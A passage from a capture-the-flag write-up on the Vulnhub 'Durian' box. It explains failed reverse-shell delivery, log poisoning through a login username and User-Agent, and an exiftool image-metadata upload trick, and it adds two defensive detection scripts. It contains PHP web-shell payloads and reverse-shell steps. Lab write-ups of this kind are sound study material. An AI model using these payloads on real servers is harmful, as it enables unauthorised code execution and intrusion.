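        severity = "INFO"      # e.g. cap_net_raw on ping: expected and harmless here
    return {**entry, "binary": binary, "runs_arbitrary_code": runs_code,
            "severity": severity, "reasons": reasons}


def audit(getcap_output: str) -> List[Dict[str, object]]:
    """Parse and rate every line of `getcap -r` output; unparseable lines are skipped."""
    findings = []
    for line in getcap_output.splitlines():
        entry = parse_getcap_line(line)
        if entry is not None:
            findings.append(assess(entry))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_GETCAP_OUTPUT):
        caps = ",".join(sorted(f["caps"]))
        why = "; ".join(f["reasons"]) or "no privilege caps"
        print(f"{f['severity']:6} {f['path']:22} {caps:16} {why}")
```

On a real host the fix for a HIGH finding is to drop the capability (`setcap -r /usr/bin/gdb`) or remove the debugger from the production image.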
Further research
Why the file fetched with wget couldn't trigger the reverse shell
The box is done, but the learning isn't: the problem of the php file uploaded via wget + a php temporary server not triggering the reverse shell is still unresolved.
So I planned to first visit the directory of the uploaded file and check its integrity.
So I ran
vi /var/www/html/blog/shell.php

竟然里面只有一句拒绝连接的语句,我们的反弹shell根本没有成功上传!!!
那一定是在文件上传之前的某个环节出现了问题
于是我又检查了一遍,尝试更换python来进行临时服务器搭建
再次遇到了先前的报错
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ python3 -m http.server 80
Traceback (most recent call last):
File "<frozen runpy>", line 198, in _run_module_as_main
File "<frozen runpy>", line 88, in _run_code
File "/usr/lib/python3.13/http/server.py", line 1323, in <module>
test(
~~~~^
HandlerClass=handler_class,
^^^^^^^^^^^^^^^^^^^^^^^^^^^
...<3 lines>...
protocol=args.protocol,
^^^^^^^^^^^^^^^^^^^^^^^
)
^
File "/usr/lib/python3.13/http/server.py", line 1270, in test
with ServerClass(addr, HandlerClass) as httpd:
~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 457, in __init__
self.server_bind()
~~~~~~~~~~~~~~~~^^
File "/usr/lib/python3.13/http/server.py", line 1317, in server_bind
return super().server_bind()
~~~~~~~~~~~~~~~~~~~^^
File "/usr/lib/python3.13/http/server.py", line 136, in server_bind
socketserver.TCPServer.server_bind(self)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 478, in server_bind
self.socket.bind(self.server_address)
~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^
OSError: [Errno 98] Address already in use
I showed it to the AI; it said my port 80 was occupied.
So I checked port usage and killed the process.
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ sudo lsof -i :80 | grep php
[sudo] password for kali:
php 8948 kali 4u IPv4 74808 0t0 TCP *:http (LISTEN)
php 8951 kali 4u IPv4 74808 0t0 TCP *:http (LISTEN)
php 8953 kali 4u IPv4 74808 0t0 TCP *:http (LISTEN)
php 8954 kali 4u IPv4 74808 0t0 TCP *:http (LISTEN)
php 8955 kali 4u IPv4 74808 0t0 TCP *:http (LISTEN)
php 8956 kali 4u IPv4 74808 0t0 TCP *:http (LISTEN)
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ pkill -f "php -S"
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ sudo lsof -i :80 | grep php
After killing the process, start the temporary server with python again.
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
It worked.
Use the RCE to download the file again, saving it as shellx.php

The download succeeded.

Start the listener and visit the directory.

Got a shell. So what was the cause?
Here is what the AI said:
The problem you found is key: your Kali built-in PHP server (**php -S**) did not serve the **shell.php** file as "source text" for download; it executed it as a PHP program, so what the box downloaded was the output of that program (the Connection refused error page), not the code itself.
This explains why the file you downloaded contained Connection refused (111). To solve it, the key is to have Kali provide a purely static file download service that does not execute PHP.
So this also explains why I received a reverse shell from Kali itself: when the box fetched shell.php from Kali with wget, the shell file was executed.
To sum up: when uploading php files, do not use php to run the temporary server; python's temporary server is purely static and more compatible than the php one.
Different log poisoning methods
Login log poisoning
Using the fingerprint extracted earlier: OpenLiteSpeed
I asked the AI for the service's default log paths:
/usr/local/lsws/logs/access.log
/usr/local/lsws/logs/error.log
/usr/local/lsws/logs/event.log
/usr/local/lsws/logs/password
Access error.log and access.log


Both give correct output.
But /usr/local/lsws/logs/password
could not be accessed.
Try logging in at the 7080 login box to trigger a log entry.

Check the log.

It shows a failed login for username Mxc.
Try injecting PHP code in the username field.

Check the log.

It was escaped; try to bypass.
Try base64 encoding:

<?php eval(base64_decode('c3lzdGVtKCdpZCcpOw=='));?>
Bypass failed.
2026-01-25 05:02:20.270372 [NOTICE] [10.10.10.128:52836:HTTP2-3#_AdminVHost] [STDERR] [WebAdmin Console] Failed Login Attempt - username:\<\?php eval\(base64_decode\('c3lzdGVtKCdpZCcpOw=='\)\)\;\?\> ip:10.10.10.128 url:
Here <, ? and so on are all escaped, so I fell into a misconception: I thought that in
https://github.com/Meowmycks/OSCPprep-Durian
the author had somehow bypassed this keyword escaping, and I was lost again.
So I decided to e-mail the author to ask about it.
Finally I realised that there is another login page under the /protect path.
Perhaps the author of that article injected through the login box on that other page.
So I tried:
2026-01-25 05:07:22.679210 [INFO] [10.10.10.128:50526#Example] User 'uid=33(www-data) gid=33(www-data) groups=33(www-data)
It executed successfully; from here the exploitation path is the same as before.
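As an added detection example (mine, not from the walkthrough), this scans log lines of the two formats seen on this page, Apache's access log (poisoned via the User-Agent) and the OpenLiteSpeed WebAdmin log (poisoned via the username), for an injected PHP open tag, and records whether the tag was stored escaped, as the WebAdmin log did, so it would not run if the file were included, or live. The sample lines are constructed, modelled on the entries shown above.

```python
import re
from typing import Dict, List

# Constructed sample lines modelled on the two log formats seen on this page
# (Apache combined log and OpenLiteSpeed WebAdmin log); they are not real captures.
APACHE_ACCESS_LOG = [
    '10.10.10.128 - - [23/Jan/2026:04:01:32 +0000] "GET /cgi-data/getImage.php?file=durian.jpg HTTP/1.1" 200 1729 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"',
    '10.10.10.128 - - [23/Jan/2026:04:01:40 +0000] "GET /blog/ HTTP/1.1" 200 5211 "-" "Mozilla/5.0 (X11; Linux x86_64) <?php system($_GET[\'cmd\']);?> AppleWebKit/537.36"',
]
LSWS_WEBADMIN_LOG = [
    "2026-01-25 05:02:20.270372 [NOTICE] [10.10.10.128:52836:HTTP2-3#_AdminVHost] [STDERR] [WebAdmin Console] Failed Login Attempt - username:\\<\\?php eval\\(base64_decode\\('c3lzdGVtKCdpZCcpOw=='\\)\\)\\;\\?\\> ip:10.10.10.128 url:",
    "2026-01-25 05:03:01.000000 [NOTICE] [10.10.10.128:52840:HTTP2-3#_AdminVHost] [STDERR] [WebAdmin Console] Failed Login Attempt - username:Mxc ip:10.10.10.128 url:",
]

# A PHP open tag in either the long form or the short echo form.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def unescape(line: str) -> str:
    """Undo the backslash escaping the WebAdmin log applies to fields (\\< -> <, \\? -> ?)."""
    return re.sub(r"\\(.)", r"\1", line)


def find_php_tags(lines: List[str], source: str) -> List[Dict[str, object]]:
    """Flag lines carrying a PHP open tag, after normalising escaping.

    'escaped' is True when the tag only appears after unescaping: such an entry
    would not execute if the log were included by PHP (what this page saw on the
    WebAdmin log), but it still records a poisoning attempt worth alerting on.
    """
    hits: List[Dict[str, object]] = []
    for lineno, raw in enumerate(lines, 1):
        normalised = unescape(raw)
        match = PHP_OPEN_TAG.search(normalised)
        if not match:
            continue
        client = IPV4.search(raw)
        hits.append({
            "source": source,
            "line": lineno,
            "client": client.group(0) if client else None,
            "escaped": PHP_OPEN_TAG.search(raw) is None,
            "snippet": normalised[match.start():match.start() + 48],
        })
    return hits


def scan_all() -> List[Dict[str, object]]:
    """Run the check over both constructed logs."""
    return (find_php_tags(APACHE_ACCESS_LOG, "apache:access")
            + find_php_tags(LSWS_WEBADMIN_LOG, "lsws:webadmin"))


if __name__ == "__main__":
    for hit in scan_all():
        state = ("stored escaped (inert if included)" if hit["escaped"]
                 else "LIVE (runs if the log is included)")
        print(f"{hit['source']}:{hit['line']} client={hit['client']} {state}: {hit['snippet']}")
```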
Why the file upload feature couldn't trigger the reverse shell
The first time, I uploaded a shell.php with a changed extension through the upload feature.

Although it returned the path /tmp/phpOA0P3X,
below it said
file is not jpg, not stored.
It detected that the file was not a jpg, so I decided to embed the code in the image metadata with exiftool (a steganography-style trick):
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ cp /home/kali/Vulnhub/Broken/img_forest.jpg 1.jpg
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ exiftool -Comment='<?php system($_GET["cmd"]); ?>' 1.jpg
1 image files updated
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ mv 1.jpg 1.php.jpg
This time the upload succeeded.

Try triggering it via LFI.
Nothing triggers.
Use the earlier shell to check the path.
www-data@durian:/tmp$ ls -alih
ls -alih
total 8.0K
2097164 drwxrwxrwt 2 root root 4.0K Jan 24 00:39 .
2 drwxr-xr-x 18 root root 4.0K Sep 7 2020 ..
No files there; try looking with find.
www-data@durian:/tmp$ find / -name "uploadfile_1.php.jpg" 2>/dev/null
find / -name "uploadfile_1.php.jpg" 2>/dev/null
www-data@durian:/tmp$ find / -name "phpIqTS0R" 2>/dev/null
find / -name "phpIqTS0R" 2>/dev/null
No file with that path exists.
So the file was never uploaded to the server at all.
This is why the file upload route didn't work!!!